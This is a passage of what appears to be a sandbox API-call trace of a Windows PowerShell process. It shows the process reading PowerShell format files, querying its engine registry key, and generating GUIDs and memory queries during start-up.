nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.959] GetLastError () returned 0x0 [0052.959] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.959] GetLastError () returned 0x0 [0052.959] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.959] GetLastError () returned 0x0 [0052.961] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.961] GetLastError () returned 0x0 [0052.961] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.961] GetLastError () returned 0x0 [0052.961] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.961] GetLastError () returned 0x0 [0052.961] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.961] GetLastError () returned 0x0 [0052.961] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, 
lpNumberOfBytesRead=0x14e9e4*=0xe67, lpOverlapped=0x0) returned 1 [0052.961] GetLastError () returned 0x0 [0052.961] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ede57, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ede57*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.961] GetLastError () returned 0x0 [0052.961] ReadFile (in: hFile=0x2f8, lpBuffer=0x27ee850, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x27ee850*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.961] GetLastError () returned 0x0 [0052.961] CloseHandle (hObject=0x2f8) returned 1 [0052.962] GetLastError () returned 0x0 [0052.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e544, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0052.962] GetLastError () returned 0x0 [0052.962] SetErrorMode (uMode=0x1) returned 0x1 [0052.962] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x280f0e0 | out: lpFileInformation=0x280f0e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0052.962] GetLastError () returned 0x0 [0052.962] SetErrorMode (uMode=0x1) returned 0x1 [0052.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, 
lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0052.962] GetLastError () returned 0x0 [0052.962] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e968 | out: phkResult=0x14e968*=0x2f8) returned 0x0 [0052.962] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x0, lpcbData=0x14e9ac*=0x0 | out: lpType=0x14e9b0*=0x1, lpData=0x0, lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.962] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14e9b0, lpData=0x3175c0, lpcbData=0x14e9ac*=0x56 | out: lpType=0x14e9b0*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14e9ac*=0x56) returned 0x0 [0052.962] RegCloseKey (hKey=0x2f8) returned 0x0 [0052.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0052.962] GetLastError () returned 0x0 [0052.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e4a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0052.962] GetLastError () returned 0x0 [0052.965] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x5259fa19, Data2=0xb037, Data3=0x44f9, Data4=([0]=0x98, [1]=0x8b, [2]=0x96, [3]=0x60, [4]=0x99, [5]=0xe8, [6]=0x9e, [7]=0xb0))) returned 0x0 [0052.965] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x49a47fc1, Data2=0x67de, Data3=0x46be, Data4=([0]=0xa4, 
[1]=0xed, [2]=0x61, [3]=0x85, [4]=0xae, [5]=0xaf, [6]=0x9f, [7]=0x22))) returned 0x0 [0052.965] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x9e057d1, Data2=0x9bbd, Data3=0x48f8, Data4=([0]=0xa5, [1]=0x7b, [2]=0x38, [3]=0xc9, [4]=0x9, [5]=0x65, [6]=0xe0, [7]=0x67))) returned 0x0 [0052.965] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x67f95f3, Data2=0xdfea, Data3=0x468f, Data4=([0]=0xa4, [1]=0x8b, [2]=0x2b, [3]=0x59, [4]=0x56, [5]=0x9b, [6]=0x76, [7]=0xd6))) returned 0x0 [0052.965] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x326d7e7a, Data2=0xc49e, Data3=0x494c, Data4=([0]=0x87, [1]=0xf2, [2]=0x50, [3]=0xb3, [4]=0xdc, [5]=0xa3, [6]=0xbb, [7]=0x70))) returned 0x0 [0052.965] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xf4a55768, Data2=0xa313, Data3=0x4200, Data4=([0]=0x82, [1]=0xee, [2]=0xc, [3]=0x56, [4]=0x8d, [5]=0x9d, [6]=0xed, [7]=0xc9))) returned 0x0 [0052.965] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xc548939f, Data2=0x9849, Data3=0x4a6c, Data4=([0]=0xbf, [1]=0x2, [2]=0x4a, [3]=0x40, [4]=0x6c, [5]=0xd6, [6]=0xf3, [7]=0x2d))) returned 0x0 [0052.965] VirtualQuery (in: lpAddress=0x14d730, lpBuffer=0x14e730, dwLength=0x1c | out: lpBuffer=0x14e730*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.966] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x9b46a408, Data2=0x4361, Data3=0x413f, Data4=([0]=0xaa, [1]=0x4d, [2]=0x18, [3]=0x47, [4]=0xf9, [5]=0xd8, [6]=0x9d, [7]=0x32))) returned 0x0 [0052.966] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xf35504b5, Data2=0x7c6f, Data3=0x401a, Data4=([0]=0x90, [1]=0xf8, [2]=0xb0, [3]=0x78, [4]=0x54, [5]=0xf3, [6]=0x80, [7]=0xb6))) returned 0x0 [0052.966] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x191cce6c, Data2=0x9e53, Data3=0x4336, Data4=([0]=0x8e, [1]=0xbd, [2]=0xb, [3]=0x52, 
[4]=0xc3, [5]=0x8a, [6]=0xb2, [7]=0x28))) returned 0x0 [0052.966] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x6cf365ad, Data2=0x6e0c, Data3=0x43b2, Data4=([0]=0x97, [1]=0x42, [2]=0xbe, [3]=0xb9, [4]=0x9, [5]=0x6e, [6]=0x62, [7]=0x13))) returned 0x0 [0052.966] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xb9304268, Data2=0x239d, Data3=0x488a, Data4=([0]=0x98, [1]=0x38, [2]=0xbd, [3]=0x95, [4]=0x58, [5]=0xba, [6]=0x0, [7]=0xb6))) returned 0x0 [0052.966] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xefee7659, Data2=0x1ffd, Data3=0x4d56, Data4=([0]=0xaf, [1]=0x9d, [2]=0x94, [3]=0xaf, [4]=0x74, [5]=0xbe, [6]=0x7e, [7]=0x6f))) returned 0x0 [0052.966] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x768c74b5, Data2=0xb29e, Data3=0x447d, Data4=([0]=0x93, [1]=0x48, [2]=0xa7, [3]=0x7b, [4]=0x64, [5]=0x6b, [6]=0x67, [7]=0xdc))) returned 0x0 [0052.966] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x2fb3ca9b, Data2=0xbf4c, Data3=0x4ca6, Data4=([0]=0x9e, [1]=0xc5, [2]=0x2b, [3]=0xd3, [4]=0xe1, [5]=0xa6, [6]=0xc6, [7]=0x2))) returned 0x0 [0052.967] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xa3d91c5d, Data2=0x1070, Data3=0x4b50, Data4=([0]=0xad, [1]=0x17, [2]=0xd5, [3]=0x7d, [4]=0xb2, [5]=0xad, [6]=0xa5, [7]=0xc1))) returned 0x0 [0052.967] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x6832cea5, Data2=0x72dc, Data3=0x4050, Data4=([0]=0xa2, [1]=0xf2, [2]=0x11, [3]=0x59, [4]=0xe4, [5]=0xe6, [6]=0x9b, [7]=0x9e))) returned 0x0 [0052.967] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xff64d600, Data2=0xb7d3, Data3=0x4516, Data4=([0]=0xa4, [1]=0x65, [2]=0xfe, [3]=0xab, [4]=0x59, [5]=0x7d, [6]=0x35, [7]=0x6c))) returned 0x0 [0052.967] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x6553d479, Data2=0x9d25, Data3=0x44bb, Data4=([0]=0x8b, [1]=0x2, [2]=0x8d, [3]=0x19, [4]=0x0, [5]=0x6a, [6]=0x7f, [7]=0x51))) returned 0x0 [0052.967] 
VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.968] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.968] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.968] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x7229c4f8, Data2=0xb5ae, Data3=0x4dda, Data4=([0]=0xa4, [1]=0xc0, [2]=0xe2, [3]=0x5f, [4]=0xe0, [5]=0x26, [6]=0x65, [7]=0x43))) returned 0x0 [0052.968] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xe824f26, Data2=0xf6b3, Data3=0x4198, Data4=([0]=0x99, [1]=0xb9, [2]=0x2, [3]=0xc1, [4]=0xce, [5]=0x5c, [6]=0xbb, [7]=0x4d))) returned 0x0 [0052.968] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x9f2decb9, Data2=0x4e6b, Data3=0x4bb6, Data4=([0]=0xb5, [1]=0x43, [2]=0xa4, [3]=0x14, [4]=0x31, [5]=0x12, [6]=0x79, [7]=0x1f))) returned 0x0 [0052.969] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x6d0f26fb, Data2=0x3a82, Data3=0x40d0, Data4=([0]=0xa9, [1]=0xdf, [2]=0x3e, [3]=0x96, [4]=0xf, [5]=0xc8, [6]=0x48, [7]=0xa4))) returned 0x0 [0052.969] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xd93e4293, Data2=0xb32c, Data3=0x4051, Data4=([0]=0xa9, [1]=0xd1, [2]=0xc5, [3]=0xd0, [4]=0xe3, [5]=0xe5, [6]=0x39, [7]=0x23))) returned 0x0 [0052.969] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x59f7d872, Data2=0x2b41, Data3=0x4620, Data4=([0]=0xb5, [1]=0x9c, [2]=0x9d, [3]=0x14, [4]=0x2, [5]=0xf6, 
[6]=0x19, [7]=0x79))) returned 0x0 [0052.969] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x725fbe89, Data2=0xc237, Data3=0x48b9, Data4=([0]=0x9e, [1]=0x7c, [2]=0xc6, [3]=0x1c, [4]=0x78, [5]=0x93, [6]=0xed, [7]=0xc4))) returned 0x0 [0052.969] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x61d8fee5, Data2=0x2915, Data3=0x47ac, Data4=([0]=0x87, [1]=0xe4, [2]=0xaa, [3]=0xff, [4]=0x16, [5]=0x29, [6]=0x39, [7]=0xba))) returned 0x0 [0052.969] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x29212f95, Data2=0xa1f8, Data3=0x40c9, Data4=([0]=0xa9, [1]=0xb3, [2]=0xe0, [3]=0xe2, [4]=0xea, [5]=0x95, [6]=0x5a, [7]=0x83))) returned 0x0 [0052.969] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x13833169, Data2=0xddbb, Data3=0x4d83, Data4=([0]=0xa8, [1]=0x42, [2]=0x40, [3]=0x61, [4]=0x66, [5]=0x7d, [6]=0xf7, [7]=0x7f))) returned 0x0 [0052.969] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xf7d88fa4, Data2=0x131a, Data3=0x4965, Data4=([0]=0x87, [1]=0x78, [2]=0xb1, [3]=0x1d, [4]=0x20, [5]=0x5f, [6]=0x27, [7]=0x3))) returned 0x0 [0052.970] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xcab9f578, Data2=0x6486, Data3=0x4963, Data4=([0]=0xb5, [1]=0x6b, [2]=0x96, [3]=0xe0, [4]=0x1b, [5]=0xa8, [6]=0x3a, [7]=0x16))) returned 0x0 [0052.970] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x33d7b60d, Data2=0x1d9d, Data3=0x492b, Data4=([0]=0x94, [1]=0xf0, [2]=0xfd, [3]=0x43, [4]=0xb1, [5]=0xc1, [6]=0x48, [7]=0xf3))) returned 0x0 [0052.970] VirtualQuery (in: lpAddress=0x14d730, lpBuffer=0x14e730, dwLength=0x1c | out: lpBuffer=0x14e730*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.970] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xd16d00a4, Data2=0x7e, Data3=0x4b8f, Data4=([0]=0x81, [1]=0xe3, [2]=0x4b, [3]=0xf2, [4]=0xfd, [5]=0xd9, [6]=0xf8, [7]=0x28))) 
returned 0x0 [0052.970] VirtualQuery (in: lpAddress=0x14d730, lpBuffer=0x14e730, dwLength=0x1c | out: lpBuffer=0x14e730*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.971] VirtualQuery (in: lpAddress=0x14d730, lpBuffer=0x14e730, dwLength=0x1c | out: lpBuffer=0x14e730*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.973] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x73256056, Data2=0x3775, Data3=0x495c, Data4=([0]=0xae, [1]=0xe6, [2]=0x73, [3]=0xbb, [4]=0xa6, [5]=0x40, [6]=0x5f, [7]=0x14))) returned 0x0 [0052.973] VirtualQuery (in: lpAddress=0x14d730, lpBuffer=0x14e730, dwLength=0x1c | out: lpBuffer=0x14e730*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.973] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x8837f573, Data2=0xd006, Data3=0x45e1, Data4=([0]=0xb7, [1]=0xa3, [2]=0xa6, [3]=0xc5, [4]=0x1b, [5]=0x7c, [6]=0xe5, [7]=0xce))) returned 0x0 [0052.973] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x215019ff, Data2=0x24cb, Data3=0x4dfd, Data4=([0]=0xaa, [1]=0x52, [2]=0xe2, [3]=0x2a, [4]=0xb1, [5]=0x2f, [6]=0x54, [7]=0xef))) returned 0x0 [0052.973] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x622466c8, Data2=0x8770, Data3=0x4290, Data4=([0]=0xac, [1]=0xb8, [2]=0xb2, [3]=0x21, [4]=0xe6, [5]=0x98, [6]=0x47, [7]=0x40))) returned 0x0 [0052.974] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x6b8703a0, Data2=0x6437, Data3=0x4039, Data4=([0]=0xa7, [1]=0xc0, [2]=0xfa, [3]=0x8c, [4]=0xff, [5]=0x3c, [6]=0xd7, [7]=0x8b))) returned 0x0 [0052.974] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x372d08af, Data2=0xf910, Data3=0x4882, Data4=([0]=0x94, [1]=0x74, [2]=0x3b, 
[3]=0x97, [4]=0xe9, [5]=0x5, [6]=0x1d, [7]=0x7))) returned 0x0 [0052.974] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x9e7bf5b9, Data2=0x49c7, Data3=0x4723, Data4=([0]=0x9c, [1]=0x84, [2]=0x22, [3]=0x78, [4]=0x59, [5]=0x73, [6]=0xe7, [7]=0x86))) returned 0x0 [0052.974] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x1d656c3f, Data2=0x24a1, Data3=0x452c, Data4=([0]=0xba, [1]=0xeb, [2]=0x94, [3]=0x3e, [4]=0x92, [5]=0x31, [6]=0xf3, [7]=0xb0))) returned 0x0 [0052.974] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.974] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xf55f2541, Data2=0x9194, Data3=0x41b2, Data4=([0]=0xaf, [1]=0x65, [2]=0xd8, [3]=0xae, [4]=0xd0, [5]=0xc3, [6]=0xb9, [7]=0x45))) returned 0x0 [0052.975] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x7ad16ec9, Data2=0x9e2d, Data3=0x4027, Data4=([0]=0xb9, [1]=0x29, [2]=0x2c, [3]=0x4d, [4]=0x4c, [5]=0x37, [6]=0xc3, [7]=0x46))) returned 0x0 [0052.975] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x40cf75bf, Data2=0x1a6b, Data3=0x417b, Data4=([0]=0xb4, [1]=0x2c, [2]=0x79, [3]=0xfd, [4]=0x60, [5]=0x66, [6]=0xd3, [7]=0x95))) returned 0x0 [0052.975] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xf7200dfc, Data2=0x8f, Data3=0x4c66, Data4=([0]=0x87, [1]=0xaa, [2]=0x53, [3]=0xf5, [4]=0x4b, [5]=0xa6, [6]=0x40, [7]=0x42))) returned 0x0 [0052.975] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xd5c59e2d, Data2=0x6b39, Data3=0x4dd2, Data4=([0]=0x84, [1]=0x23, [2]=0xa3, [3]=0xf2, [4]=0x5e, [5]=0xbb, [6]=0xd0, [7]=0x3))) returned 0x0 [0052.975] VirtualQuery (in: lpAddress=0x14d710, lpBuffer=0x14e710, dwLength=0x1c | out: lpBuffer=0x14e710*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, 
RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.975] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0x6f261b4b, Data2=0xc442, Data3=0x4fed, Data4=([0]=0x86, [1]=0xb6, [2]=0x8e, [3]=0x4d, [4]=0xd2, [5]=0xd2, [6]=0x71, [7]=0xd5))) returned 0x0 [0052.975] CoCreateGuid (in: pguid=0x14e9d8 | out: pguid=0x14e9d8*(Data1=0xc1db7a1d, Data2=0x8cd3, Data3=0x4631, Data4=([0]=0xbf, [1]=0x2d, [2]=0x90, [3]=0x5, [4]=0x9f, [5]=0x53, [6]=0xa7, [7]=0xb3))) returned 0x0 [0052.976] VirtualQuery (in: lpAddress=0x14d738, lpBuffer=0x14e738, dwLength=0x1c | out: lpBuffer=0x14e738*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.976] VirtualQuery (in: lpAddress=0x14d738, lpBuffer=0x14e738, dwLength=0x1c | out: lpBuffer=0x14e738*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.976] VirtualQuery (in: lpAddress=0x14d738, lpBuffer=0x14e738, dwLength=0x1c | out: lpBuffer=0x14e738*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.976] VirtualQuery (in: lpAddress=0x14d738, lpBuffer=0x14e738, dwLength=0x1c | out: lpBuffer=0x14e738*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0052.976] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e47c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0052.976] GetLastError () returned 0x0 [0052.976] SetErrorMode (uMode=0x1) returned 0x1 [0052.976] CreateFileW 
(lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8 [0052.976] GetLastError () returned 0x0 [0052.976] GetFileType (hFile=0x2f8) returned 0x1 [0052.976] SetErrorMode (uMode=0x1) returned 0x1 [0052.976] GetFileType (hFile=0x2f8) returned 0x1 [0052.976] ReadFile (in: hFile=0x2f8, lpBuffer=0x28df228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x28df228*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.978] GetLastError () returned 0x0 [0052.978] ReadFile (in: hFile=0x2f8, lpBuffer=0x28df228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x28df228*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.978] GetLastError () returned 0x0 [0052.979] ReadFile (in: hFile=0x2f8, lpBuffer=0x28df228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x28df228*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.979] GetLastError () returned 0x0 [0052.979] ReadFile (in: hFile=0x2f8, lpBuffer=0x28df228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x28df228*, lpNumberOfBytesRead=0x14e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0052.979] GetLastError () returned 0x0 [0052.979] ReadFile (in: hFile=0x2f8, lpBuffer=0x28df228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x28df228*, lpNumberOfBytesRead=0x14e9e4*=0x8b4, lpOverlapped=0x0) returned 1 [0052.979] GetLastError () returned 0x0 [0052.979] ReadFile (in: hFile=0x2f8, lpBuffer=0x28de67c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x14e9e4, 
lpOverlapped=0x0 | out: lpBuffer=0x28de67c*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.979] GetLastError () returned 0x0 [0052.979] ReadFile (in: hFile=0x2f8, lpBuffer=0x28df228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e9e4, lpOverlapped=0x0 | out: lpBuffer=0x28df228*, lpNumberOfBytesRead=0x14e9e4*=0x0, lpOverlapped=0x0) returned 1 [0052.979] GetLastError () returned 0x0 [0052.979] CloseHandle (hObject=0x2f8) returned 1 [0052.979] GetLastError () returned 0x0 [0052.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14e544, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 